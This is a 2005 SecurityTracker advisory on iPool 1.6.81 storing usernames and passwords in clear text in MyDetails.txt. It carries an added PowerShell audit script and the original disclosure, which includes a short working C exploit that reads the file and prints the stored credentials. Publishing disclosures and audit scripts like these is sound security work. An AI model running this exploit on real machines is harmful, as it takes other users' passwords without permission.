Category:   Application (Game)  >   iPool
Vendors:   thepoolclub.com
iPool Discloses Passwords to Local Users
SecurityTracker Alert ID:  1013458
SecurityTracker URL:  http://securitytracker.com/id/1013458
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 16 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 1.6.81 and prior versions
Description:   Kozan reported a vulnerability in iPool. A local user can obtain passwords.

The software stores user passwords in clear text in the 'Program Files\ThePoolClub\iPool\MyDetails.txt' file. A local user can read the file to obtain the target user's username and password.

Impact:   A local user can obtain a target user's iPool password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.thepoolclub.com/dls.html
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.
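
An audit for the condition described above, as an added example that is not part of the SecurityTracker entry or the source message: this PowerShell script looks for MyDetails.txt at the path the advisory gives, reports which accounts the file's ACL allows to read it, and counts populated lines without printing them. Checking both Program Files roots is an assumption for 64-bit Windows.

```powershell
# Added audit example (not from the advisory). The relative path comes from the
# advisory; searching both Program Files roots is an assumption for 64-bit Windows.
$relative = 'ThePoolClub\iPool\MyDetails.txt'
$roots = @($env:ProgramFiles, ${env:ProgramFiles(x86)}) |
    Where-Object { $_ } | Select-Object -Unique

# ReadData is the rights bit that lets a principal read the file's contents.
$readBit = [int][System.Security.AccessControl.FileSystemRights]::ReadData

foreach ($root in $roots) {
    $path = Join-Path $root $relative
    if (-not (Test-Path -LiteralPath $path -PathType Leaf)) {
        Write-Output "Not present: $path"
        continue
    }

    # Count populated lines only; never echo the stored username or password.
    $populated = @(Get-Content -LiteralPath $path -TotalCount 2 |
        Where-Object { $_.Trim() }).Count
    Write-Output "FOUND: $path (populated credential lines: $populated of 2)"

    # List every Allow ACE that grants read access to the file.
    $acl = Get-Acl -LiteralPath $path
    Write-Output "  Owner: $($acl.Owner)"
    foreach ($ace in $acl.Access) {
        $canRead = ([int]$ace.FileSystemRights -band $readBit) -ne 0
        if ($ace.AccessControlType -eq 'Allow' -and $canRead) {
            $src = if ($ace.IsInherited) { 'inherited' } else { 'explicit' }
            Write-Output "  READ allowed: $($ace.IdentityReference) ($src)"
        }
    }
}
```

A result listing broad groups such as local Users under "READ allowed" means every local account on the host can read the stored credentials.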


 Source Message Contents

Subject:  iPool <= v1.6.81 Discloses Passwords to Local Users


iPool <= v1.6.81 Discloses Passwords to Local Users


I. BACKGROUND
-------------------

iPool is an online pool game and chat software.


Vendor: The Pool Club - thepoolclub.com
and Memir Software - memirsoftware.com


II. DESCRIPTION
-------------------

iPool stores and transmits passwords in
Program Files\ThePoolClub\iPool\MyDetails.txt file in clear text.

Password storing format of this file:
1. line = Username
2. line = Password


III. ANALYSIS
-------------------

Storing authentication credentials in clear text format is not a good idea.
This can be stolen through local access to the hard drive. In this situation,
the username and password can be obtained merely by viewing the txt file.


IV. DETECTION
-------------------

All versions of iPool are vulnerable.


V. EXPLOIT
-------------------


/*****************************************************************

iPool <= v1.6.81 Local Password Disclosure Exploit by Kozan

Application: iPool 1.6.81

Vendor:
Memir Software - memirsoftware.com and
The Pool Club - thepoolclub.com

Vulnerable Description:
iPool 1.6.81 discloses passwords to local users.

Discovered & Coded by Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int main()
{
        if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                        0,
                        KEY_QUERY_VALUE,
                        &hKey) == ERROR_SUCCESS)
        {

            lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
               (LPBYTE) prgfiles, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured. Can't get password!\n");
                                 return -1;
                        }

                        RegCloseKey(hKey);

    }
        else
        {
                printf("An error occured. Can't get password!\n");
                return -1;
        }

        printf("\n\niPool 1.6.81 Local Password Disclosure Exploit by Kozan\n");
        printf("Credits to ATmaCA\n");
        printf("kozan@netmagister.com\n");
        printf("www.netmagister.com - www.spyinstructors.com\n\n");


        char pwdfile[BUFSIZE], username[BUFSIZE], password[BUFSIZE];
        strcpy(pwdfile,strcat(prgfiles,"\\ThePoolClub\\iPool\\MyDetails.txt"));

        int addr, i, y;
        FILE *fp;
        char ch[100], ch2[100];

        if((fp=fopen(pwdfile,"rb")) == NULL)
        {
                printf("An error occured. Can't get password!\n");
                return -1;
        }


        fseek(fp,0,0);


        for(i=0;i<30;i++)
        {
                ch[i]=getc(fp);
                if(ch[i]==0x0D)
                {
                        ch[i]=NULL;
                        strcpy(username,ch);
                        break;
                }
        }

        addr = ftell(fp);
        fseek(fp,addr+1,0);

        for(y=0;y<30;y++)
        {
                ch2[y]=getc(fp);
                if(ch2[y]==0x0D)
                {
                        ch2[y]=NULL;
                        strcpy(password,ch2);
                        break;
                }
        }

        fclose(fp);

        printf("Username        : %s\n",username);
        printf("Password        : %s\n",password);

        return 0;
}




Kozan...
 
 

